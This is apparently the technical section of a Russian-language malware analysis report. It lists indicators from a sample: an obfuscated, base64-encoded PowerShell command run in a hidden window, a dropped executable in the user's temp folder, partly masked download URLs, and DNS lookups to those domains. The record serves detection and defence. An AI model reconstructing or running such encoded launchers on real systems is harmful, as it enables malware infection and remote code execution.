Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\t6l_wggw8.exe
- %TEMP%\word\2019\t6l_wggw8.exe
- %TEMP%\word\2019\t6l_wggw8.exe
- http://ka####i-hermes.com/cgi-bin/8/
- http://kr###-world.com/cgi-bin/v/
- http://kr###all.com/assets/qCu/
- http://la####ohmann.com/cgi-bin/9/
- DNS ASK ka####i-hermes.com
- DNS ASK kr###-world.com
- DNS ASK kr###all.com
- DNS ASK ko###amusic.com
- DNS ASK la####ohmann.com
- DNS ASK la####adelcel.com
- DNS ASK in#####ionsstarter.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)